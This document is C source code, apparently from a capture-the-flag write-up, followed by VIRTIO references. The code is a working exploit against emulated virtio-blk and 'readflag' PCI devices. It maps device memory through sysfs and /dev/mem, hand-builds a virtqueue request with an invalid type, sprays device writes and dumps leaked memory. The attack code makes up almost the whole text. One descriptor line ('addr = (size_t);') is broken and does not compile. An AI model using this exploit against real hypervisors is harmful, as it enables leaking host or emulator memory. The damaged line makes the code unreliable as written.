struct virtio_blk_req {
    le32 type;
    le32 reserved;
    le64 sector;
    u8 data[];
    // u8 status;
};

/* Values for virtio_blk_req.type. main() deliberately uses a value not listed here. */
#define VIRTIO_BLK_T_IN 0
#define VIRTIO_BLK_T_OUT 1
#define VIRTIO_BLK_T_FLUSH 4
#define VIRTIO_BLK_T_GET_ID 8
#define VIRTIO_BLK_T_GET_LIFETIME 10
#define VIRTIO_BLK_T_DISCARD 11
#define VIRTIO_BLK_T_WRITE_ZEROES 13
#define VIRTIO_BLK_T_SECURE_ERASE 14


/*
 * Print one virtio PCI capability to stdout: its length, a textual name for
 * cfg_type, then bar, id, offset and length in hexadecimal.
 */
void print_cap(struct virtio_pci_cap* cap){
    const char* type_line;

    printf("cap_len: %x\n", cap->cap_len);

    /* Pick the complete output line for this cfg_type. */
    switch(cap->cfg_type){
        case VIRTIO_PCI_CAP_COMMON_CFG:    type_line = "cfg_type: common\n";        break;
        case VIRTIO_PCI_CAP_NOTIFY_CFG:    type_line = "cfg_type: notify\n";        break;
        case VIRTIO_PCI_CAP_ISR_CFG:       type_line = "cfg_type: isr\n";           break;
        case VIRTIO_PCI_CAP_DEVICE_CFG:    type_line = "cfg_type: device\n";        break;
        case VIRTIO_PCI_CAP_PCI_CFG:       type_line = "cfg_type: pci\n";           break;
        case VIRTIO_PCI_CAP_SHARED_MEMORY: type_line = "cfg_type: shared memory\n"; break;
        case VIRTIO_PCI_CAP_VENDOR_CFG:    type_line = "cfg_type: vendor\n";        break;
        default:                           type_line = "cfg_type: unknown\n";       break;
    }
    fputs(type_line, stdout);

    printf("bar: %x\n", cap->bar);
    printf("id: %x\n", cap->id);
    printf("offset: %x\n", cap->offset);
    printf("length: %x\n", cap->length);
}

/*
 * Fatal-error helper: prints buf together with the current errno text via
 * perror(), then terminates the process with abort(). Does not return.
 */
void ERR(const char* buf){
    perror(buf);
    abort();
}

/* Write the NUL-terminated string buf to file descriptor 2, without a newline. */
void LOG(const char* buf){
    size_t length = strlen(buf);
    write(2, buf, length);
}

/* Mapping of resource0 of the readflag device; set by init_readflag(). */
volatile char* readflag_mmio = NULL;
/* Mapping of resource4 of the virtio-blk device; set by init_virtio(). */
volatile char* virtio_mmio = NULL;
/* Locations inside virtio_mmio of the structures named by the PCI capabilities. */
volatile char* virtio_common_mmio = NULL;
volatile struct virtio_notify_cfg* virtio_notify_mmio = NULL;
volatile char* virtio_isr_mmio = NULL;
volatile char* virtio_device_mmio = NULL;
/* /dev/mem mapping holding the virtqueue; dma_data is dma_mem + 0x1000. */
volatile char* dma_mem = NULL;
volatile char* dma_data = NULL;
/* Descriptor table, avail ring and used ring inside dma_mem. */
volatile struct virtq_desc* queue_desc = NULL;
volatile struct virtq_avail* queue_avail = NULL;
volatile struct virtq_used* queue_used = NULL;

/*
 * Map 0x1000 bytes of resource0 of the device at 0000:00:05.0 read/write
 * and publish the mapping in readflag_mmio. Terminates through ERR() when
 * the open or the mmap fails.
 */
void init_readflag(){
    int bar_fd;
    void* mapping;

    bar_fd = open("/sys/devices/pci0000:00/0000:00:05.0/resource0", O_RDWR | O_SYNC);
    if(bar_fd < 0){
        ERR("Open readflag");
    }

    mapping = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, bar_fd, 0);
    readflag_mmio = mapping;
    if(mapping == MAP_FAILED){
        ERR("mmap mmio_mem");
    }

    /* The mapping outlives the descriptor. */
    close(bar_fd);

    puts("readflag init done");
}

/* Perform one 8-bit volatile load from addr and return the value. */
uint8_t mmio_read8(void* addr){
    volatile uint8_t* reg = addr;
    return reg[0];
}

/* Perform one 16-bit volatile load from addr and return the value. */
uint16_t mmio_read16(void* addr){
    volatile uint16_t* reg = addr;
    return reg[0];
}

/* Perform one 32-bit volatile load from addr and return the value. */
uint32_t mmio_read32(void* addr){
    volatile uint32_t* reg = addr;
    return reg[0];
}

/* Perform one 64-bit volatile load from addr and return the value. */
uint64_t mmio_read64(void* addr){
    volatile uint64_t* reg = addr;
    return reg[0];
}

/* Perform one 8-bit volatile store of val to addr. */
void mmio_write8(void* addr, uint8_t val){
    volatile uint8_t* reg = addr;
    reg[0] = val;
}

/* Perform one 16-bit volatile store of val to addr. */
void mmio_write16(void* addr, uint16_t val){
    volatile uint16_t* reg = addr;
    reg[0] = val;
}

/* Perform one 32-bit volatile store of val to addr. */
void mmio_write32(void* addr, uint32_t val){
    volatile uint32_t* reg = addr;
    reg[0] = val;
}

/* Perform one 64-bit volatile store of val to addr. */
void mmio_write64(void* addr, uint64_t val){
    volatile uint64_t* reg = addr;
    reg[0] = val;
}

/*
 * Full memory barrier: executes the x86 `mfence` instruction and, through
 * the "memory" clobber, stops the compiler from moving memory accesses
 * across the call. Spelled with __asm__ so it also builds in strict ISO
 * modes (-std=c11), where the bare `asm` keyword is not available.
 */
void mb(){
    __asm__ __volatile__("mfence":::"memory");
}

void init_virtio() {
    int fd = open("/sys/devices/pci0000:00/0000:00:04.0/config", O_RDONLY);
    if(fd < 0){
        ERR("Open virtio config");
    }
    struct virtio_pci_cap cap;
    char* config = malloc(0x1000);
    int bytes_read = read(fd, config, 0x1000);
    if(bytes_read < 0){
        ERR("Read virtio config");
    }

    fd = open("/sys/devices/pci0000:00/0000:00:04.0/resource4", O_RDWR | O_SYNC);
    if(fd < 0){
        ERR("Open virtio resource4");
    }
    virtio_mmio = mmap(0, 0x4000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if(virtio_mmio == (volatile void*)-1){
        ERR("mmap virtio mem");
    }
    close(fd);

    u8 cap_ptr = *(u8*)(config+0x34);
    while(cap_ptr != 0){
        if(config[cap_ptr] != 0x9){
            cap_ptr = *(u8*)(config+cap_ptr+1);
            continue;
        }
        memcpy(&cap, config+cap_ptr, sizeof(cap));
        print_cap(&cap);
        switch(cap.cfg_type){
            case VIRTIO_PCI_CAP_COMMON_CFG:
                virtio_common_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_NOTIFY_CFG:
                virtio_notify_mmio = (struct virtio_notify_cfg*)((size_t)virtio_mmio + cap.offset);
                break;
            case VIRTIO_PCI_CAP_ISR_CFG:
                virtio_isr_mmio = virtio_mmio + cap.offset;
                break;
            case VIRTIO_PCI_CAP_DEVICE_CFG:
                virtio_device_mmio = virtio_mmio + cap.offset;
                break;
            default:
                break;
        }
        cap_ptr = cap.cap_next;
    }
    close(fd);
    free(config);

    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    mmio_write32(&common_cfg->device_feature_select, 0);
    printf("device_feature[0]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->device_feature_select, 1);
    printf("device_feature[1]: %x\n", mmio_read32(&common_cfg->device_feature));
    mmio_write32(&common_cfg->driver_feature_select, 0);
    printf("driver_feature[0]: %x\n", mmio_read32(&common_cfg->driver_feature));
    mmio_write32(&common_cfg->driver_feature_select, 1);
    printf("driver_feature[1]: %x\n", mmio_read32(&common_cfg->driver_feature));

    struct virtio_blk_config* blk_cfg = (struct virtio_blk_config*)virtio_device_mmio;
    printf("capacity: %lx\n", mmio_read64(&blk_cfg->capacity));
    printf("size_max: %x\n", mmio_read32(&blk_cfg->size_max));
    printf("seg_max: %x\n", mmio_read32(&blk_cfg->seg_max));
    printf("geometry.cylinders: %x\n", mmio_read16(&blk_cfg->geometry.cylinders));
    printf("geometry.heads: %x\n", mmio_read8(&blk_cfg->geometry.heads));
    printf("geometry.sectors: %x\n", mmio_read8(&blk_cfg->geometry.sectors));
    printf("blk_size: %x\n", mmio_read32(&blk_cfg->blk_size));

    // reset device
    mmio_write8(&common_cfg->device_status, 0);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    mmio_write32(&common_cfg->driver_feature_select, 0);
    mmio_write32(&common_cfg->driver_feature, 0); // disable all features
    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    assert(mmio_read8(&common_cfg->device_status) & VIRTIO_CONFIG_S_FEATURES_OK);


    // alloc dma memory
    int dma_fd = open("/dev/mem", O_RDWR | O_SYNC);
    if(dma_fd < 0){
        ERR("Open dma");
    }
    dma_mem = mmap((void*)0x3ffdd000, 0x3000, PROT_READ | PROT_WRITE, MAP_SHARED, dma_fd, 0x3ffdd000);
    if(dma_mem == (volatile void*)-1){
        ERR("mmap dma mem");
    }
    *(volatile uint32_t*)dma_mem = 0x12345678;
    printf("%x\n", *(volatile uint32_t*)dma_mem);
    *(volatile uint32_t*)dma_mem = 0;
    printf("dma_mem: %p\n", dma_mem);
    dma_data = dma_mem + 0x1000;
    queue_desc = (struct virtq_desc*)dma_mem;
    queue_avail = (struct virtq_avail*)((char*)queue_desc + 0x10 * VIRTIO_QUEUE_SIZE);
    queue_used = (struct virtq_used*)((char*)dma_mem + 0x200);

    // init queue
    mmio_write16(&common_cfg->queue_select, 0);
    mmio_write16(&common_cfg->queue_size, VIRTIO_QUEUE_SIZE);
    mmio_write64(&common_cfg->queue_desc, (size_t)0x3ffdd000);
    mmio_write64(&common_cfg->queue_driver, (size_t)0x3ffdd100);
    mmio_write64(&common_cfg->queue_device, (size_t)0x3ffdd200);
    mmio_write16(&common_cfg->queue_enable, 1);

    mmio_write8(&common_cfg->device_status, VIRTIO_CONFIG_S_DRIVER_OK | VIRTIO_CONFIG_S_FEATURES_OK | VIRTIO_CONFIG_S_DRIVER | VIRTIO_CONFIG_S_ACKNOWLEDGE);
    puts("virtio init done");
}

/*
 * Issue one 32-bit write to offset 0 of the readflag mapping for each value
 * 0xfff, 0xffb, ... down to 0x2b (step 4, stopping once the value is no
 * longer greater than 0x28).
 */
void spray(){
    int length = 0xfff;

    while(length > 0x28){
        mmio_write32((void*)readflag_mmio, length);
        length -= 4;
    }
}

/*
 * Print size bytes starting at addr to stdout as text: bytes in the range
 * 0x20..0x7e are printed as themselves, every other byte as '?'. No newline
 * is appended.
 *
 * Whole 4-byte groups are fetched with a single 32-bit volatile load and
 * emitted lowest byte first. When size is not a multiple of 4 the remaining
 * 1-3 bytes are fetched one at a time, so nothing beyond addr + size is read.
 */
void hexdump(void* addr, size_t size){
    volatile uint8_t* base = (volatile uint8_t*)addr;
    size_t pos = 0;

    // dump 4 bytes per time
    for(; size - pos >= 4; pos += 4){
        uint32_t val = *(volatile uint32_t*)(base + pos);
        for(int j = 0; j < 4; j++){
            uint8_t chr = (val >> (j*8)) & 0xff;
            if(chr >= 0x20 && chr <= 0x7e){
                putchar(chr);
            }else{
                putchar('?');
            }
        }
    }

    /* Tail shorter than one word. */
    for(; pos < size; pos++){
        uint8_t chr = base[pos];
        if(chr >= 0x20 && chr <= 0x7e){
            putchar(chr);
        }else{
            putchar('?');
        }
    }
}

int main(){
    setbuf(stdout, NULL);
    init_readflag();
    init_virtio();

    volatile struct virtio_blk_req* req = (struct virtio_blk_req*)dma_data;
    req->type = 0xffffffffu;
    req->sector = 0;
    req->reserved = 0;

    queue_desc[0].addr = (size_t)req;
    queue_desc[0].len = 0x10;
    queue_desc[0].flags = VIRTQ_DESC_F_NEXT;
    queue_desc[0].next = 1;
    queue_desc[1].addr = (size_t);
    queue_desc[1].len = 0xfff;
    queue_desc[1].flags = VIRTQ_DESC_F_WRITE | VIRTQ_DESC_F_NEXT;
    queue_desc[1].next = 2;
    queue_desc[2].addr = (size_t)dma_data + 0xa00;
    queue_desc[2].len = 1;
    queue_desc[2].flags = VIRTQ_DESC_F_WRITE;
    queue_desc[2].next = 0;

    queue_avail->flags = 1;
    queue_avail->ring[0] = 0;
    queue_avail->idx = 1;
    mb();
    mmio_write8((void*)virtio_isr_mmio, 1);
    struct virtio_pci_common_cfg* common_cfg = (struct virtio_pci_common_cfg*)virtio_common_mmio;
    void* notify_addr = (void*)((uintptr_t)virtio_notify_mmio + mmio_read32((void*)&virtio_notify_mmio->cap.offset) + mmio_read16(&common_cfg->queue_notify_off) * mmio_read32((void*)&virtio_notify_mmio->notify_off_multiplier));
    puts("--------------------------------");
    for(int i = 0; i < 0x100; i+=4){
        spray();
    }
    mmio_write16(notify_addr, 0);
    puts("--------------------------------");
    hexdump((char*)virtio_common_mmio + 0x000, 0x100);

    munmap(dma_mem, 0x3000);
    munmap(virtio_mmio, 0x4000);
    munmap(readflag_mmio, 0x1000);
}

References


  1. Virtual I/O Device (VIRTIO) Version 1.1↩︎

  2. Virtqueues and virtio ring: How the data travels↩︎

  3. Memory-mapped I/O and port-mapped I/O↩︎